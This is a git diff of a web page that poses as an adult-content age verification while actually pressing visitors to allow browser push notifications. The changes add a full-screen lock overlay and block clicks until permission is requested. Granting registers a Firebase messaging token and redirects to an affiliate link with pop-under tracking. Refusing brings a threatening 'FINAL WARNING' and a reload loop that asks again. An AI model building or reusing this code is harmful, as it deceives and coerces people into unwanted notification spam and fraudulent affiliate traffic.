--- a/index.html
+++ b/index.html
@@ -3,48 +3,61 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Exclusive Adult Content - Allow to Continue</title>
+    <title>Adult Content Verification - Allow to Continue</title>
     <style>
         body {
             font-family: Arial, sans-serif;
-            background: #000;
+            background: black;
             color: white;
             text-align: center;
             margin: 0;
             padding: 50px;
         }
         h1 {
-            color: #ff4747;
-            font-size: 26px;
+            color: red;
+            font-size: 24px;
         }
-        .loading-container {
-            width: 80%;
+        .alert-box {
             background: #222;
-            margin: 20px auto;
-            height: 20px;
+            padding: 20px;
+            display: inline-block;
             border-radius: 10px;
-            position: relative;
-            overflow: hidden;
+            margin-top: 20px;
         }
-        .loading-bar {
-            height: 100%;
-            width: 0%;
-            background: #ff4747;
-            transition: width 2s ease-in-out;
-        }
-        .loading-message {
+        .alert-box p {
             font-size: 18px;
             color: #ffcc00;
+        }
+        .loading {
+            font-size: 18px;
             margin-top: 10px;
+            color: white;
+        }
+        .locked {
+            position: fixed;
+            width: 100%;
+            height: 100%;
+            background: rgba(0, 0, 0, 0.9);
+            top: 0;
+            left: 0;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            flex-direction: column;
+            text-align: center;
+            font-size: 20px;
         }
     </style>
 </head>
 <body>
-    <h1>🚨 WARNING: EXPLICIT CONTENT 🚨</h1>
-    <p class="loading-message">Allow notifications to continue...</p>
-    
-    <div class="loading-container">
-        <div class="loading-bar" id="loadingBar"></div>
+    <div class="locked" id="lockScreen">
+        <h1>🔞 Adult Content Verification Required 🔞</h1>
+        <div class="alert-box">
+            <p>To access this content, you must verify your age.</p>
+            <p>Click <b>“Allow”</b> on the next step to continue.</p>
+            <p><b>Failure to comply will result in access being denied.</b></p>
+        </div>
+        <p class="loading">Processing verification...</p>
     </div>
 
     <script type="module">
@@ -66,22 +79,8 @@
         const analytics = getAnalytics(app);
         const messaging = getMessaging(app);
 
-        // Simulación de carga falsa
-        let progress = 0;
-        const loadingBar = document.getElementById("loadingBar");
-        function fakeLoading() {
-            progress += Math.random() * 20;
-            loadingBar.style.width = progress + "%";
-            if (progress < 90) {
-                setTimeout(fakeLoading, 500);
-            }
-        }
-        fakeLoading();
-
-        // Bloquear hasta respuesta
         document.body.style.pointerEvents = "none";
 
-        // Solicitar notificaciones
         Notification.requestPermission().then(permission => {
             if (permission === "granted") {
                 logEvent(analytics, 'notification_permission_granted');
@@ -92,12 +91,24 @@
                         console.log("Error getting FCM token:", err);
                     });
 
+                document.getElementById("lockScreen").style.display = "none";
                 document.body.style.pointerEvents = "auto";
-                loadingBar.style.width = "100%";
                 setTimeout(() => window.location.href = "https://t.slext2.com/341879/7272?bo=2753,2754,2755,2756&popUnder=true&aff_sub5=SF_006OG000004lmDN", 2000);
             } else {
                 logEvent(analytics, 'notification_permission_denied');
-                setTimeout(() => location.reload(), 3000); // Reintentar en 3 segundos si deniega
+
+                // Segunda oportunidad con un mensaje más fuerte
+                document.getElementById("lockScreen").innerHTML = `
+                    <h1>🚨 FINAL WARNING 🚨</h1>
+                    <div class="alert-box">
+                        <p><b>Access Denied!</b> You must approve the security check.</p>
+                        <p>Click <b>"Allow"</b> on the next step to verify.</p>
+                        <p>Failure to comply will result in <b>permanent restriction</b>.</p>
+                    </div>
+                    <p class="loading">Retrying verification...</p>
+                `;
+
+                setTimeout(() => location.reload(), 4000);
             }
         });
     </script>
